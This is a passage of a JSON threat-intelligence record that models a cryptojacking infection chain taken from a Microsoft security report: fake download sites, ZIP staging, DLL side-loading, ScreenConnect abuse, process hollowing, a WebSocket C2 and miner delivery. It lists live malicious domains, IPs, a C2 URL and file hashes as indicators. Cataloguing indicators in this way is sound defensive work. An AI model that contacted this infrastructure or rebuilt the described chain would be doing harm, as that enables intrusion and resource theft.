      "review_notes": "Microsoft lists this giize.com domain as malicious ZIP hosting in linked campaigns leading to the same infection chain."
    },
    {
      "entity_id": "e005",
      "role": "staging",
      "techniques": [
        "IIM-T008",
        "IIM-T024"
      ],
      "role_confidence": "likely",
      "technique_confidence": "confirmed",
      "review_notes": "Microsoft lists this giize.com domain as malicious ZIP hosting in linked campaigns leading to the same infection chain."
    },
    {
      "entity_id": "e006",
      "role": "staging",
      "techniques": [
        "IIM-T024"
      ],
      "role_confidence": "confirmed",
      "technique_confidence": "confirmed"
    },
    {
      "entity_id": "e007",
      "role": "payload",
      "techniques": [],
      "role_confidence": "confirmed"
    },
    {
      "entity_id": "e008",
      "role": "payload",
      "techniques": [],
      "role_confidence": "confirmed"
    },
    {
      "entity_id": "e009",
      "role": "payload",
      "techniques": [],
      "role_confidence": "confirmed"
    },
    {
      "entity_id": "e010",
      "role": "c2",
      "techniques": [],
      "role_confidence": "confirmed"
    },
    {
      "entity_id": "e011",
      "role": "c2",
      "techniques": [],
      "role_confidence": "confirmed"
    },
    {
      "entity_id": "e012",
      "role": "payload",
      "techniques": [],
      "role_confidence": "confirmed"
    },
    {
      "entity_id": "e013",
      "role": "payload",
      "techniques": [],
      "role_confidence": "confirmed"
    },
    {
      "entity_id": "e014",
      "role": "payload",
      "techniques": [],
      "role_confidence": "confirmed"
    },
    {
      "entity_id": "e015",
      "role": "c2",
      "techniques": [
        "IIM-T008",
        "IIM-T021"
      ],
      "role_confidence": "confirmed",
      "technique_confidence": "confirmed",
      "review_notes": "C2 uses a gleeze.com Dynamic DNS hostname. Certificate pinning is modeled as request/connection fingerprint gating because the C2 session is accepted only when the pinned TLS fingerprint matches the embedded expectation."
    },
    {
      "entity_id": "e016",
      "role": "c2",
      "techniques": [
        "IIM-T012"
      ],
      "role_confidence": "confirmed",
      "technique_confidence": "confirmed"
    },
    {
      "entity_id": "e017",
      "role": "c2",
      "techniques": [
        "IIM-T012"
      ],
      "role_confidence": "confirmed",
      "technique_confidence": "confirmed"
    },
    {
      "entity_id": "e018",
      "role": "c2",
      "techniques": [
        "IIM-T012"
      ],
      "role_confidence": "confirmed",
      "technique_confidence": "confirmed"
    },
    {
      "entity_id": "e019",
      "role": "c2",
      "techniques": [
        "IIM-T012"
      ],
      "role_confidence": "confirmed",
      "technique_confidence": "confirmed"
    },
    {
      "entity_id": "e020",
      "role": "payload",
      "techniques": [],
      "role_confidence": "confirmed"
    }
  ],
  "relations": [
    {
      "from": "e001",
      "to": "e002",
      "type": "download",
      "sequence_order": 1,
      "observed_at": "2026-05-26T00:00:00Z",
      "confidence": "confirmed",
      "x_evidence": [
        "Fake-site download buttons retrieve ZIP archives from campaign-specific gleeze.com subdomains."
      ]
    },
    {
      "from": "e001",
      "to": "e003",
      "type": "download",
      "sequence_order": 2,
      "observed_at": "2026-05-26T00:00:00Z",
      "confidence": "confirmed",
      "x_evidence": [
        "Microsoft IOC table lists start-download.gleeze.com as malicious ZIP hosting in this campaign."
      ]
    },
    {
      "from": "e001",
      "to": "e004",
      "type": "download",
      "sequence_order": 3,
      "observed_at": "2026-05-26T00:00:00Z",
      "confidence": "likely",
      "x_evidence": [
        "Microsoft lists direct-downloads.giize.com as ZIP hosting in additional linked DynamicDNS campaigns leading to the same infection chain."
      ]
    },
    {
      "from": "e001",
      "to": "e005",
      "type": "download",
      "sequence_order": 4,
      "observed_at": "2026-05-26T00:00:00Z",
      "confidence": "likely",
      "x_evidence": [
        "Microsoft lists free-download.giize.com as ZIP hosting in additional linked DynamicDNS campaigns leading to the same infection chain."
      ]
    },
    {
      "from": "e002",
      "to": "e006",
      "type": "download",
      "sequence_order": 5,
      "observed_at": "2026-05-26T00:00:00Z",
      "confidence": "confirmed",
      "x_evidence": [
        "direct-download.gleeze.com is listed as a domain that hosts malicious ZIP files."
      ]
    },
    {
      "from": "e003",
      "to": "e006",
      "type": "download",
      "sequence_order": 6,
      "observed_at": "2026-05-26T00:00:00Z",
      "confidence": "confirmed",
      "x_evidence": [
        "start-download.gleeze.com is listed as a domain that hosts malicious ZIP files."
      ]
    },
    {
      "from": "e004",
      "to": "e006",
      "type": "download",
      "sequence_order": 7,
      "observed_at": "2026-05-26T00:00:00Z",
      "confidence": "likely",
      "x_evidence": [
        "direct-downloads.giize.com is listed as ZIP hosting in linked similar campaigns leading to the same infection chain."
      ]
    },
    {
      "from": "e005",
      "to": "e006",
      "type": "download",
      "sequence_order": 8,
      "observed_at": "2026-05-26T00:00:00Z",
      "confidence": "likely",
      "x_evidence": [
        "free-download.giize.com is listed as ZIP hosting in linked similar campaigns leading to the same infection chain."
      ]
    },
    {
      "from": "e006",
      "to": "e007",
      "type": "drops",
      "sequence_order": 9,
      "observed_at": "2026-05-26T00:00:00Z",
      "confidence": "confirmed",
      "x_evidence": [
        "The ZIP contains a legitimate utility executable alongside malicious autorun.dll."
      ]
    },
    {
      "from": "e007",
      "to": "e008",
      "type": "drops",
      "sequence_order": 10,
      "observed_at": "2026-05-26T00:00:00Z",
      "confidence": "confirmed",
      "x_evidence": [
        "autorun.dll uses msiexec.exe to silently install vcredist_x64.dll, a packaged ScreenConnect installer."
      ]
    },
    {
      "from": "e008",
      "to": "e009",
      "type": "execute",
      "sequence_order": 11,
      "observed_at": "2026-05-26T00:00:00Z",
      "confidence": "confirmed",
      "x_evidence": [
        "The installed ScreenConnect package produces a ScreenConnect client service invocation."
      ]
    },
    {
      "from": "e009",
      "to": "e010",
      "type": "connect",
      "sequence_order": 12,
      "observed_at": "2026-05-26T00:00:00Z",
      "confidence": "confirmed",
      "x_evidence": [
        "The service invocation contains h=directdownload.icu; Microsoft states this is the host the client connects to."
      ]
    },
    {
      "from": "e009",
      "to": "e011",
      "type": "connect",
      "sequence_order": 13,
      "observed_at": "2026-05-26T00:00:00Z",
      "confidence": "confirmed",
      "x_evidence": [
        "Microsoft states the ScreenConnect client communicates with attacker-controlled server 193.42.11.108."
      ]
    },
    {
      "from": "e010",
      "to": "e011",
      "type": "resolves-to",
      "sequence_order": 14,
      "observed_at": "2026-05-26T00:00:00Z",
      "confidence": "likely",
      "x_evidence": [
        "The service invocation host is directdownload.icu and the same installed ScreenConnect client is stated to communicate with 193.42.11.108. Microsoft does not explicitly publish DNS resolution records; modeled as likely."
      ]
    },
    {
      "from": "e011",
      "to": "e012",
      "type": "drops",
      "sequence_order": 15,
      "observed_at": "2026-05-26T00:00:00Z",
      "confidence": "confirmed",
      "x_evidence": [
        "After the ScreenConnect session is established, the attacker drops SimpleRunPE.exe through ScreenConnect file-transfer."
      ]
    },
    {
      "from": "e012",
      "to": "e013",
      "type": "drops",
      "sequence_order": 16,
      "observed_at": "2026-05-26T00:00:00Z",
      "confidence": "confirmed",
      "x_evidence": [
        "SimpleRunPE.exe writes a hidden copy of itself as RuntimeHost.exe."
      ]
    },
    {
      "from": "e013",
      "to": "e014",
      "type": "execute",
      "sequence_order": 17,
      "observed_at": "2026-05-26T00:00:00Z",
      "confidence": "confirmed",
      "x_evidence": [
        "RuntimeHost.exe relaunches/hollows a legitimate Microsoft-signed .NET utility target."
      ]
    },
    {
      "from": "e014",
      "to": "e015",
      "type": "connect",
      "sequence_order": 18,
      "observed_at": "2026-05-26T00:00:00Z",
      "confidence": "confirmed",
      "x_evidence": [
        "Microsoft states decrypting the embedded blob yields the WebSocket C2 URL used by the hollowed binary."
      ]
    },
    {
      "from": "e014",
      "to": "e016",
      "type": "references",
      "sequence_order": 19,
      "observed_at": "2026-05-26T00:00:00Z",
      "confidence": "confirmed",
      "x_evidence": [
        "The malware hardcodes the SHA-256 fingerprint of the TLS certificate expected at the endpoint for pinning."
      ]
    },
    {
      "from": "e016",
      "to": "e017",
      "type": "references",
      "sequence_order": 20,
      "observed_at": "2026-05-26T00:00:00Z",
      "confidence": "confirmed",
      "x_relation_semantics": "certificate-observed-on-ip",
      "x_evidence": [
        "Microsoft states the hard-coded certificate was observed on 93.115.10.35 and assesses the IP as C2 infrastructure."
      ]
    },
    {
      "from": "e016",
      "to": "e018",
      "type": "references",
      "sequence_order": 21,
      "observed_at": "2026-05-26T00:00:00Z",
      "confidence": "confirmed",
      "x_relation_semantics": "certificate-observed-on-ip",
      "x_evidence": [
        "Microsoft states the hard-coded certificate was observed on 198.23.185.238 and assesses the IP as C2 infrastructure."
      ]
    },
    {
      "from": "e016",
      "to": "e019",
      "type": "references",
      "sequence_order": 22,
      "observed_at": "2026-05-26T00:00:00Z",
      "confidence": "confirmed",
      "x_relation_semantics": "certificate-observed-on-ip",
      "x_evidence": [
        "Microsoft states the hard-coded certificate was observed on 2.59.132.106 and assesses the IP as C2 infrastructure."
      ]
    },
    {
      "from": "e014",
      "to": "e020",
      "type": "download",
      "sequence_order": 23,
      "observed_at": "2026-05-26T00:00:00Z",
      "confidence": "confirmed",
      "x_evidence": [
        "Microsoft states the hollowed binary downloads the appropriate miner archive at runtime and runs it. The exact archive URL was not published."
      ]
    }
  ],
  "attack_annotations": [
    {
      "technique_id": "T1189",
      "name": "Drive-by Compromise",
      "tactic": "Initial Access",
      "comment": "Users searching for utilities are directed to attacker-controlled lookalike download sites through poisoned search results."
    },
    {
      "technique_id": "T1105",
      "name": "Ingress Tool Transfer",
      "tactic": "Command and Control",
      "comment": "ZIP payloads, SimpleRunPE.exe, and runtime miner archives are transferred into the environment."
    },
    {
      "technique_id": "T1574.002",
      "name": "Hijack Execution Flow: DLL Side-Loading",
      "tactic": "Persistence/Privilege Escalation/Defense Evasion",
      "comment": "Legitimate utility executable loads autorun.dll from the same folder."
    },
    {
      "technique_id": "T1219",
      "name": "Remote Access Software",
      "tactic": "Command and Control",
      "comment": "ScreenConnect is abused to establish persistent remote access."
    },
    {
      "technique_id": "T1055.012",
      "name": "Process Injection: Process Hollowing",
      "tactic": "Defense Evasion/Privilege Escalation",
      "comment": "SimpleRunPE/RuntimeHost hollow Microsoft-signed .NET utilities."
    },
    {
      "technique_id": "T1496",
      "name": "Resource Hijacking",
      "tactic": "Impact",
      "comment": "The campaign downloads and runs GPU-focused mining tools."
    }
  ],
  "x_source": {
    "title": "From poisoned search results to GPU mining: A cryptojacking campaign abusing ScreenConnect and Microsoft .NET utilities",
    "publisher": "Microsoft Defender Experts and Microsoft Defender Security Research Team",
    "url": "https://www.microsoft.com/en-us/security/blog/2026/05/26/poisoned-search-results-gpu-mining-cryptojacking-campaign-abusing-screenconnect-microsoft-net-utilities/",
    "published_at": "2026-05-26",
    "retrieved_at": "2026-05-27T00:00:00Z",
    "source_policy": "Original Microsoft source only. The Hacker News and other secondary summaries were intentionally not used for the chain content."
  },
  "x_source_reports": [
    {
      "publisher": "Microsoft Security Blog",
      "title": "From poisoned search results to GPU mining: A cryptojacking campaign abusing ScreenConnect and Microsoft .NET utilities",
      "url": "https://www.microsoft.com/en-us/security/blog/2026/05/26/poisoned-search-results-gpu-mining-cryptojacking-campaign-abusing-screenconnect-microsoft-net-utilities/",
      "published_at": "2026-05-26",
      "authors": [
        "Microsoft Defender Experts",
        "Microsoft Defender Security Research Team"
      ]
    }
  ],
  "x_source_urls": [
    "https://www.microsoft.com/en-us/security/blog/2026/05/26/poisoned-search-results-gpu-mining-cryptojacking-campaign-abusing-screenconnect-microsoft-net-utilities/"
  ],
  "x_resource_links_verified": [
    {
      "url": "https://www.microsoft.com/en-us/security/blog/2026/05/26/poisoned-search-results-gpu-mining-cryptojacking-campaign-abusing-screenconnect-microsoft-net-utilities/",
      "status": "opened twice via web retrieval before packaging",
      "verified_at": "2026-05-27T00:00:00Z",
      "notes": "The page title, publication date, attack-chain sections, IOC table, and Microsoft authorship were checked against the original URL."
    }
  ],
  "x_iocs": {
    "domains": [
      "direct-download.gleeze.com",
      "start-download.gleeze.com",
      "direct-downloads.giize.com",
      "free-download.giize.com",
      "directdownload.icu"
    ],
    "urls": [
      "wss://minemine.gleeze.com:8443/ws"
    ],
    "ips": [
      "193.42.11.108",
      "93.115.10.35",
      "198.23.185.238",
      "2.59.132.106"
    ],
    "sha256": [
      "16562974deec80e41ef57a71a6de8c03ceb393005fb1432f8d9d82c61294ef8c",
      "1b2555b09ac62164638f47c8272beb6b0f97186e37d3a54cb84c723ff7a2eee5",
      "062bb28765fbaa11f8cc341fa16e2c7f942a122d929cb41f4a0f755b4429f246",
      "c7425fbe6c3a4937934215c54027d4b67202d12ab490682fae03498870d66d06",
      "a460d00ef93c8ce70d32e48e55781af66a53328fc2dde45519be196c265de074",
      "db2d33c4e6e4a5c2263b56e8303c343305a94dde1fc2968304ba260acbbd9f9f",
      "cf3f8160eb5a5580e0c35054847e3ac4d01e9fe74fab8bc12bf6e8a40bf696b2",
      "69077fcf940fc5852fb32beed15636756ebc04ac971b7ed71d36251e7ea70a20",
      "2ee93ccbcd49ed94c65dcf52e7dcb8f0fa0a443ca24c0e0c7f79152efba657b7",
      "9ff07c9fafa9c03fdf69e4abf6806aa7c938b5480e7e258f227db0719ecd6386",
      "7035c2abeb617e828dfda1b119b8544fa9ae15a1d263d18bc5506acaf381f496",
      "e021662a652ba95c8778b991056696ab3c9b0f60d5e23b1e6cf73c3847db6610"
    ],
    "certificate_fingerprint_sha256": [
      "EB:C3:5D:4A:08:D9:3A:88:0E:90:AE:AD:2D:3F:7F:B4:3F:DC:08:EA:77:DB:9D:D5:2F:80:78:1E:6B:FD:88:67"
    ]
  },
  "x_limitations": [
    "Microsoft does not publish the exact >150 fake utility landing domains; they are represented as a report-backed landing-domain set, not as fabricated domain IoCs.",
    "The exact malicious ZIP archive filenames and URLs are not published; ZIP staging is modeled through the published hosting domains and the report-described archive structure.",
    "The relation directdownload.icu -> 193.42.11.108 is marked likely because Microsoft publishes the ScreenConnect host parameter and the communicating IP, but not an explicit DNS resolution record.",
    "giize.com staging domains are marked as linked sibling infrastructure because Microsoft describes them as linked similar campaigns leading to the same infection chain.",
    "The runtime miner archive download is confirmed, but the archive source URL was not published."
  ],
  "x_selection_reason": "Strong public IIM candidate because the source describes a complete infrastructure chain: poisoned discovery surface, fake download domains, Dynamic DNS staging, archive delivery, RMM C2, hands-on file transfer, encrypted WebSocket C2, certificate-pivoted C2 infrastructure, and runtime miner delivery.",
  "x_publication_safety": "TLP:CLEAR / public OSINT conversion. No private telemetry beyond Microsoft-published report details was added."
}